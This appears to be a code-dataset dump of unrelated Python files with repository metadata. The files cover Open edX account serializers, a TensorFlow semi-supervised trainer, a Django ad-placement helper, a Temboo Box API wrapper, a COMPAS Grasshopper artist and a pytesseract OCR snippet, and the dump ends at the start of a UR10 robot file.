merged_social_links = new_social_links + pruned_unreplaced_social_links
instance.social_links.all().delete()
instance.social_links.bulk_create(merged_social_links)
except ValueError as err:
# If we have encountered any validation errors, return them to the user.
raise errors.AccountValidationError({
'social_links': {
"developer_message": f"Error when adding new social link: '{str(err)}'",
"user_message": str(err)
}
})
def update(self, instance, validated_data):
"""
Update the profile, including nested fields.
Raises:
errors.AccountValidationError: the update was not attempted because validation errors were found with
the supplied update
"""
language_proficiencies = validated_data.pop("language_proficiencies", None)
# Update all fields on the user profile that are writeable,
# except for "language_proficiencies" and "social_links", which we'll update separately
update_fields = set(self.get_writeable_fields()) - {"language_proficiencies"} - {"social_links"}
for field_name in update_fields:
default = getattr(instance, field_name)
field_value = validated_data.get(field_name, default)
setattr(instance, field_name, field_value)
# Update the related language proficiency
if language_proficiencies is not None:
instance.language_proficiencies.all().delete()
instance.language_proficiencies.bulk_create([
LanguageProficiency(user_profile=instance, code=language["code"])
for language in language_proficiencies
])
# Update the user's social links
requested_social_links = self._kwargs['data'].get('social_links') # lint-amnesty, pylint: disable=no-member
if requested_social_links:
self._update_social_links(instance, requested_social_links)
instance.save()
return instance
class RetirementUserProfileSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of UserProfile data for use in RetirementStatus APIs
"""
class Meta:
model = UserProfile
fields = ('id', 'name')
class RetirementUserSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of User data for use in RetirementStatus APIs
"""
profile = RetirementUserProfileSerializer(read_only=True)
class Meta:
model = User
fields = ('id', 'username', 'email', 'profile')
class RetirementStateSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of RetirementState data for use in RetirementStatus APIs
"""
class Meta:
model = RetirementState
fields = ('id', 'state_name', 'state_execution_order')
class UserRetirementStatusSerializer(serializers.ModelSerializer):
"""
Perform serialization for the RetirementStatus model
"""
user = RetirementUserSerializer(read_only=True)
current_state = RetirementStateSerializer(read_only=True)
last_state = RetirementStateSerializer(read_only=True)
class Meta:
model = UserRetirementStatus
exclude = ['responses', ]
class UserSearchEmailSerializer(serializers.ModelSerializer):
"""
Perform serialization for the User model used in accounts/search_emails endpoint.
"""
class Meta:
model = User
fields = ('email', 'id', 'username')
class UserRetirementPartnerReportSerializer(serializers.Serializer):
"""
Perform serialization for the UserRetirementPartnerReportingStatus model
"""
user_id = serializers.IntegerField()
student_id = serializers.CharField(required=False)
original_username = serializers.CharField()
original_email = serializers.EmailField()
original_name = serializers.CharField()
orgs = serializers.ListField(child=serializers.CharField())
orgs_config = serializers.ListField(required=False)
created = serializers.DateTimeField()
# Required overrides of abstract base class methods, but we don't use them
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class PendingNameChangeSerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Serialize the PendingNameChange model
"""
new_name = serializers.CharField()
class Meta:
model = PendingNameChange
fields = ('new_name',)
def validate_new_name(self, new_name):
if contains_html(new_name):
raise serializers.ValidationError('Name cannot contain the following characters: < >')
if contains_url(new_name):
raise serializers.ValidationError('Name cannot contain a URL')
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
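The serializer decides which account fields to expose by resolving a visibility level and mapping it to a field list in the configuration. Below is a framework-free sketch of that resolution; the names and config values are illustrative, and the real code additionally consults per-field preferences for the "custom" level.
# Illustrative constants; the real values live in the accounts package constants.
PRIVATE, ALL_USERS, CUSTOM = 'private', 'all_users', 'custom'

def resolve_visible_fields(profile_privacy, requires_parental_consent, configuration):
    # Mirrors _visible_fields/get_profile_visibility above, with plain values in place of models.
    if requires_parental_consent:
        privacy = PRIVATE
    else:
        privacy = profile_privacy or configuration['default_visibility']
    if privacy == ALL_USERS:
        return configuration['bulk_shareable_fields']
    if privacy == CUSTOM:
        return configuration['public_fields']   # simplified: skip the per-field preference lookup
    return configuration['public_fields']

config = {'default_visibility': PRIVATE,
          'bulk_shareable_fields': ['username', 'bio', 'country'],
          'public_fields': ['username']}
print(resolve_visible_fields(None, False, config))         # -> ['username']
print(resolve_visible_fields(ALL_USERS, False, config))    # -> ['username', 'bio', 'country']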
| 0
| 613
| 0
| 19,924
| 0
| 0
| 0
| 706
| 684
|
c14b091cf5862855f63fbbe263409ba8262d2632
| 12,598
|
py
|
Python
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 61
|
2019-06-06T19:22:14.000Z
|
2022-03-24T01:38:59.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 3
|
2019-07-22T14:24:55.000Z
|
2020-09-30T09:15:34.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 10
|
2019-06-06T18:41:27.000Z
|
2022-03-24T01:39:13.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
| 54.301724
| 230
| 0.656057
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
import tensorflow as tf
from cclp.routines.schedules.schedules import apply_growth
from cclp.neuralnet.trainers import losses
class Trainer(object):
    # A class separate from the model, so the optimization state is kept separately.
def __init__(self, params, net_model, t_sup_labels):
self._params = params # A dictionary or dictionary-like ConfigFlags.
self._ema = tf.train.ExponentialMovingAverage(decay=0.99)
self._loss_total_weighted = self._setup_losses( net_model, t_sup_labels )
self._t_learning_rate = self._get_t_learning_rate( net_model ) # Can be returning scalar or tensor (eg from schedule).
self._train_op = self._create_train_op()
self._increase_model_step_op = tf.assign( net_model.get_t_step(), net_model.get_t_step() + 1)
tf.summary.scalar( 'Loss_Total_weighted', self._loss_total_weighted )
tf.summary.scalar( 'Learning_Rate', self._t_learning_rate )
def _setup_losses(self, net_model, t_sup_labels):
# net_model: Instance of ./cclp/neuralnet/models/classifier/Classifier.
losses.add_softmax_cross_entr( logits = net_model.tensor_families["train_sup"]["logits_tens"],
lbls = t_sup_labels,
weight = self._params["logit_weight"] )
if self._params["cc_loss_on"]:
losses.add_cclp_loss(
Z_l = net_model.tensor_families["train_sup"]["emb_z_tens"],
Z_u = net_model.tensor_families["train_unsup"]["emb_z_tens"],
y_l_lbls = t_sup_labels,
c_classes = net_model.get_num_classes(),
# Params for creating the graph
sim_metric = self._params["cc_sim_metric"],
l2_sigmas = self._params["cc_l2_sigmas_init"],
l2_sigmas_trainable = self._params["cc_l2_sigmas_trainable"],
# Params for CCLP loss
cclp_weight = self._params["cc_weight"],
cclp_steps = self._params["cc_steps"],
sum_over_chains = self._params["cc_sum_over_chains"],
# Others
e_smooth = self._params["cc_e_smooth"],
optim_smooth_mtx = self._params["cc_optim_smooth_mtx"] )
loss_total_weighted = tf.losses.get_total_loss(add_regularization_losses=True) # tf keeps track of everything. Losses registered eg in add_logit_loss and L2 are here.
return loss_total_weighted
def _get_t_learning_rate(self, net_model):
# Set up learning rate
if self._params["lr_sched_type"] == 'expon_decay':
t_learning_rate = tf.maximum( tf.train.exponential_decay( self._params["lr_expon_init"], net_model.get_t_step(), self._params["lr_expon_decay_steps"], self._params["lr_expon_decay_factor"], staircase=True),
self._params["lr_min_value"])
elif self._params["lr_sched_type"] == 'piecewise':
            # The GitHub repo notes that the piecewise schedule was used for SVHN.
t_learning_rate = tf.maximum( tf.train.piecewise_constant( net_model.get_t_step(), boundaries = [ tf.cast(v, tf.int32) for v in self._params["lr_piecewise_boundaries"] ], values = self._params["lr_piecewise_values"] ),
self._params["lr_min_value"])
return t_learning_rate
def _get_grads_after_calc_grads_and_g_to_v_per_loss(self, list_of_trainable_vars):
# Get all losses
list_of_all_added_losses = tf.losses.get_losses() # THIS DOES NOT INCLUDE REGULARIZATION LOSSES!
# ... See last line: https://github.com/tensorflow/tensorflow/blob/r1.5/tensorflow/python/ops/losses/util.py
list_of_all_added_losses += tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) # This is where L2 is placed.
LOG.debug("list_of_all_added_losses = " + str(list_of_all_added_losses) )
LOG.debug("tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) = " + str(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) )
list_of_grads_for_each_var_per_loss = [] # will be of shape NumLosses x numVars
for loss in list_of_all_added_losses:
LOG.info('Computing grads of each var wrt Loss: '+loss.name )
grads_for_this_loss = tf.gradients( loss, list_of_trainable_vars )
list_of_grads_for_each_var_per_loss.append( grads_for_this_loss )
        # Now that we have, for each variable, the gradients from each loss separately, compute the ratio of the gradient norm to the variable norm, and an EMA of it to report.
list_of_loss_names_to_print_ratios = ['loss_logit_weighted', 'loss_LP_unl_entr_weighted', 'loss_hop0_weighted',
'loss_hop1_weighted', 'loss_hop2_weighted', 'loss_hop3_weighted', 'loss_hop4_weighted', 'loss_hop5_weighted',
'loss_hopNeg0_weighted' ]
list_of_ema_update_ops = []
for loss_i in range( len(list_of_all_added_losses) ) :
this_loss_name = list_of_all_added_losses[loss_i].name
if any( [ this_loss_name.startswith( name_of_interest ) for name_of_interest in list_of_loss_names_to_print_ratios ] ):
LOG.debug('LOSS FOUND! this_loss_name='+this_loss_name)
grads_for_this_loss = list_of_grads_for_each_var_per_loss[loss_i]
sum_of_all_pow2_grads = 0
sum_of_all_pow2_vars = 0
for grad, var in zip( grads_for_this_loss, list_of_trainable_vars ):
# Each "grad" is of different shape. eg a tensor of shape [3,3,32,32] for conv, or [3] for bias, etc. So I need to treat them carefully.
# Same for Variables tensors.
if grad is None:
continue # eg in the case that a var does not depend on a loss. eg classif layer to auxiliary losses.
sum_of_all_pow2_grads += tf.reduce_sum( tf.pow(grad, 2) )
sum_of_all_pow2_vars += tf.reduce_sum( tf.pow(var, 2) )
norm_grads = tf.sqrt( sum_of_all_pow2_grads )
norm_vars = tf.sqrt( sum_of_all_pow2_vars )
ratio_g_to_v = norm_grads / norm_vars
# Maintain and report a moving average for each ratio:
list_of_ema_update_ops.append( self._ema.apply([ratio_g_to_v]) )
ema_ratio_g_to_v = self._ema.average( ratio_g_to_v )
tf.summary.scalar('RatioGtoV_'+this_loss_name, ema_ratio_g_to_v)
# Add up the gradients from each different loss into one total gradient for each variable, that the optimizer will then apply
grads_total_for_each_var = None
for grads_wrt_specific_loss in list_of_grads_for_each_var_per_loss:
if grads_total_for_each_var is None:
grads_total_for_each_var = grads_wrt_specific_loss
else:
assert len(grads_total_for_each_var) == len(grads_wrt_specific_loss)
num_var_n_grad_tensors = len(grads_total_for_each_var)
for grad_i in range( num_var_n_grad_tensors ):
if grads_wrt_specific_loss[grad_i] is None:
continue # eg if a loss does not depend on a variable. Eg, LP losses wrt classification layer.
elif grads_total_for_each_var[grad_i] is None: # eg if the corresponding variable was independent of the very first loss.
grads_total_for_each_var[grad_i] = grads_wrt_specific_loss[grad_i]
else:
grads_total_for_each_var[grad_i] = grads_total_for_each_var[grad_i] + grads_wrt_specific_loss[grad_i]
return grads_total_for_each_var, list_of_ema_update_ops
def _create_train_op(self):
list_of_optimizers = []
list_of_trainable_var_collections = []
list_of_train_ops = []
"""
LOG.debug("***** Are we correctly getting update ops of BN? *****" )
LOG.debug("tf.get_collection(tf.GraphKeys.UPDATE_OPS)=" + str( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) )
LOG.debug("len( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) = " + str( len(tf.get_collection(tf.GraphKeys.UPDATE_OPS)) ) )
for thing in tf.get_collection(tf.GraphKeys.UPDATE_OPS):
LOG.debug( "thing = " + str(thing) )
"""
# Make main op, training all the tf.GraphKeys.TRAINABLE_VARIABLES. All separately trained are in different collections.
trainable_vars_main = tf.get_collection( tf.GraphKeys.TRAINABLE_VARIABLES )
        list_of_trainable_var_collections.append( trainable_vars_main ) # concatenate all trainable vars in a list/collection.
optimizer_main = tf.train.AdamOptimizer( self._t_learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-07 )
#optimizer_main = tf.train.RMSPropOptimizer( self._t_learning_rate, decay=0.9, momentum=0.6, epsilon=1e-8 )
#optimizer_main = tf.train.MomentumOptimizer( self._t_learning_rate, momentum=0.9, use_nesterov=True )
list_of_optimizers.append( optimizer_main )
if self._params["cc_loss_on"] and self._params["cc_sim_metric"] == "L2" and self._params['cc_l2_sigmas_trainable']:
trainable_lp_l2_sigmas = tf.get_collection( 'TRAINABLE_LP_L2_SIGMAS' )
list_of_trainable_var_collections.append( trainable_lp_l2_sigmas )
optimizer_sigmas = tf.train.AdamOptimizer( self._t_learning_rate * self._params['cc_l2_sigmas_lr_multipl'] )
list_of_optimizers.append( optimizer_sigmas )
# Add more "special" trainable var collections here if needed...
# Get all trainable vars in one list
list_of_trainable_vars = [ var for sublist in list_of_trainable_var_collections for var in sublist ]
if self._params["track_ratio_g_v"] :
LOG.debug("Going to calculate grads per loss separately, to track ratio of grads/var. Slow." )
# grads_total_for_each_var: total gradient for each variable. shape: number of variables.
# list_of_ema_update_ops: one for each tracked loss in list_of_loss_names_to_print_ratios
grads_total_for_each_var, list_of_ema_update_ops = self._get_grads_after_calc_grads_and_g_to_v_per_loss(list_of_trainable_vars)
else :
LOG.debug("Not tracking grads/var. Calc grad from total_loss." )
grads_total_for_each_var = tf.gradients( self._loss_total_weighted, list_of_trainable_vars )
list_of_ema_update_ops = []
        # Now let's apply the grads to the parameters, with the appropriate optimizer / learning rate.
low_counter = 0
for i in range( len(list_of_trainable_var_collections) ) :
var_collection = list_of_trainable_var_collections[i]
high_counter = low_counter+len(var_collection)
grads_for_this_var_collection = grads_total_for_each_var[ low_counter: high_counter ]
optimizer = list_of_optimizers[i]
train_op = optimizer.apply_gradients( zip(grads_for_this_var_collection, var_collection) )
list_of_train_ops.append(train_op)
low_counter = high_counter
all_ops_to_run_at_one_train_step = list_of_train_ops
all_ops_to_run_at_one_train_step += list_of_ema_update_ops
all_ops_to_run_at_one_train_step += tf.get_collection(tf.GraphKeys.UPDATE_OPS) # This one keeps updates of Batch normalization.
total_train_op = tf.group( *all_ops_to_run_at_one_train_step )
return total_train_op
def get_train_op(self):
return self._train_op
def get_increase_model_step_op(self):
return self._increase_model_step_op
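When track_ratio_g_v is enabled, the trainer reports, per loss, the ratio of the global gradient norm to the global variable norm, smoothed with an exponential moving average. A numpy-only illustration of the tracked quantity (shapes and values are made up, not taken from the model):
import numpy as np

rng = np.random.default_rng(0)
grads = [rng.standard_normal((3, 3, 32, 32)), rng.standard_normal(32)]      # per-variable grads for one loss
variables = [rng.standard_normal((3, 3, 32, 32)), rng.standard_normal(32)]  # matching variable tensors

norm_grads = np.sqrt(sum((g ** 2).sum() for g in grads))
norm_vars = np.sqrt(sum((v ** 2).sum() for v in variables))
print('grad/var norm ratio:', norm_grads / norm_vars)   # the quantity smoothed with an EMA above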
| 0
| 0
| 0
| 12,018
| 0
| 0
| 0
| 60
| 91
|
69e1c7f030fdae6cc022477307bb6b668d3bc021
| 2,726
|
py
|
Python
|
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
#import util_preparation as up
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
| 29.956044
| 100
| 0.573001
|
#import util_preparation as up
import pandas as pd
import random
import os
import csv
from .models import *
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
def generagte_random_ads(video_id,N_ADS=3):
    # Determine which ads to insert
    # Available ads can be looked up in ad_urls.csv
ads = []
ads = [[ad.ad_id, ad.href, ad.src] for ad in Ad.objects.all() if ad.ad_id != 1]
# reader = csv.reader(open(r"/home/www/res/ad/ad_urls.csv", "r",encoding="utf8"))
# for item in reader:
# ad_id = int(item[0])
# ad_url = item[1]
# ads.append([ad_id, ad_url])
    # Randomly pick N_ADS of them
ads = random.sample(ads, N_ADS)
    # Determine the insertion times
    # Walk over all _shot.csv files and find the one matching the current video
available_times = []
available_local_shot_ids = []
for path,dir_list,file_list in os.walk(r"/home/www/res/video_shot_csv"):
for file_name in file_list:
id = int(file_name.split("/")[-1].split("_")[0].replace("video",""))
video = Video.objects.get(video_id=video_id)
v_length = video.length
shots:Shot = Shot.objects.filter(video=video)
for shot in shots:
#start_time = float(item[START_TIME_COL])
end_time = shot.end_time
                # The end time of every shot is a candidate insertion point
                # Time points too close to the start or end (within the prevent durations) are dropped automatically
if end_time > START_PREVENT_DURATION and end_time < v_length - END_PREVENT_DURATION:
available_times.append(end_time)
available_local_shot_ids.append(shot.local_shot_id)
def randomize_time():
ad_times = random.sample(available_times, N_ADS)
ad_times.sort()
for i in range(0,N_ADS):
if (i-1)>0:
if abs(ad_times[i] - ad_times[i-1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
if (i+1)<len(ad_times):
if abs(ad_times[i] - ad_times[i+1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
return ad_times
if len(available_times) > N_ADS:
ad_times = randomize_time()
#print(ad_times)
else:
#print("ERROR: len(available_times) <= N_ADS")
return []
local_shot_ids = []
for time in ad_times:
local_shot_ids.append(available_local_shot_ids[available_times.index(time)])
# print(ad_times)
result = []
for i in range(0, N_ADS):
result.append({
"ad_id":ads[i][0],
"time":ad_times[i],
"local_shot_id":local_shot_ids[i],
"href":ads[i][1],
"src":ads[i][2]
})
#print(result)
return result
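# --- Illustrative sketch (editor's addition, not part of the source file) ---
# The core of randomize_time() above: keep re-sampling N candidate times until every
# pair of chosen times is at least PREVENT_DURATION seconds apart. The rejection-sampling
# version below is standalone (no Django models); the candidate list, helper name and
# parameter values are made up for the example.
import random

def sample_spaced_times(candidates, n, min_gap):
    while True:
        times = sorted(random.sample(candidates, n))
        if all(b - a >= min_gap for a, b in zip(times, times[1:])):
            return times

print(sample_spaced_times(list(range(120, 600, 10)), 3, 60))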
| 222
| 0
| 0
| 0
| 0
| 2,440
| 0
| -33
| 134
|
5f7d6c5925fe4e52b86831fe3e20e0cbb51570a3
| 4,646
|
py
|
Python
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
| 40.754386
| 206
| 0.674774
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ZipFile(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ZipFile Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ZipFile, self).__init__(temboo_session, '/Library/Box/Files/ZipFile')
def new_input_set(self):
return ZipFileInputSet()
def _make_result_set(self, result, path):
return ZipFileResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ZipFileChoreographyExecution(session, exec_id, path)
class ZipFileInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ZipFile
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
super(ZipFileInputSet, self)._set_input('AccessToken', value)
def set_AsUser(self, value):
"""
Set the value of the AsUser input for this Choreo. ((optional, string) The ID of the user. Only used for enterprise administrators to make API calls for their managed users.)
"""
super(ZipFileInputSet, self)._set_input('AsUser', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to zip.)
"""
super(ZipFileInputSet, self)._set_input('FileID', value)
def set_SharedLink(self, value):
"""
        Set the value of the SharedLink input for this Choreo. ((conditional, json) A JSON object representing the item's shared link and associated permissions. See documentation for formatting examples.)
"""
super(ZipFileInputSet, self)._set_input('SharedLink', value)
def set_ZipFileLocation(self, value):
"""
Set the value of the ZipFileLocation input for this Choreo. ((conditional, string) The id of the folder to put the new zip file in. When not specified, the zip file will be put in the root folder.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileLocation', value)
def set_ZipFileName(self, value):
"""
Set the value of the ZipFileName input for this Choreo. ((required, string) The name of the zip file that will be created.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileName', value)
class ZipFileResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ZipFile Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((string) The response from Box. This contains the newly created zip file metadata.)
"""
return self._output.get('Response', None)
def get_URL(self):
"""
Retrieve the value for the "URL" output from this Choreo execution. ((string) The url for the newly created zip file.)
"""
return self._output.get('URL', None)
class ZipFileChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ZipFileResultSet(response, path)
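# --- Illustrative usage sketch (editor's addition, not part of the source file) ---
# A minimal sketch of driving the ZipFile Choreo defined above, following the usual
# Temboo SDK pattern. The TembooSession import path, the execute_with_results() call
# and all credential/input values are assumptions or placeholders, not taken from this file.
from temboo.core.session import TembooSession

session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')  # placeholder credentials
choreo = ZipFile(session)
inputs = choreo.new_input_set()
inputs.set_AccessToken('BOX_ACCESS_TOKEN')   # placeholder OAuth2 token
inputs.set_FileID('12345')                   # placeholder Box file id
inputs.set_ZipFileName('archive.zip')
results = choreo.execute_with_results(inputs)
print(results.get_URL())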
| 0
| 0
| 0
| 3,428
| 0
| 0
| 0
| 104
| 204
|
68408fe7a5c1690df451641f4565f48305c8e19c
| 830
|
py
|
Python
|
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
| 23.714286
| 68
| 0.659036
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_ghpython
from compas.artists import PrimitiveArtist
from .artist import GHArtist
class PointArtist(GHArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
"""
def __init__(self, point, **kwargs):
super(PointArtist, self).__init__(primitive=point, **kwargs)
def draw(self):
"""Draw the point.
Returns
-------
:class:`Rhino.Geometry.Point3d`
"""
points = [self._get_args(self.primitive)]
return compas_ghpython.draw_points(points)[0]
@staticmethod
def _get_args(primitive):
return {'pos': list(primitive)}
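# --- Illustrative usage sketch (editor's addition, not part of the source file) ---
# A minimal sketch of drawing a COMPAS point with the artist above. It is meant to run
# inside a Grasshopper Python component where Rhino geometry is available; the Point
# import is the standard compas.geometry primitive, and the call site is an assumption.
from compas.geometry import Point

artist = PointArtist(Point(1.0, 2.0, 3.0))
gh_point = artist.draw()   # Rhino.Geometry.Point3d, per the draw() docstring above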
| 0
| 62
| 0
| 539
| 0
| 0
| 0
| 29
| 90
|
9ec102cb665e7539c5fa44c0ec648ab7542b5df8
| 167
|
py
|
Python
|
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
| 20.875
| 41
| 0.760479
|
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
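# --- Illustrative variation (editor's addition, not part of the source file) ---
# pytesseract also accepts a language hint, and the tesseract binary location can be set
# explicitly when it is not on PATH. Both are part of the public pytesseract API; the
# path shown below is only an example, not a requirement of the script above.
import pytesseract
from PIL import Image

# pytesseract.pytesseract.tesseract_cmd = r"/usr/local/bin/tesseract"  # only if tesseract is not on PATH
print(pytesseract.image_to_string(Image.open('test.png'), lang='eng'))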
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
5e646af002eec7affa6c340d69f3649382ec6a9a
| 17,625
|
py
|
Python
|
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
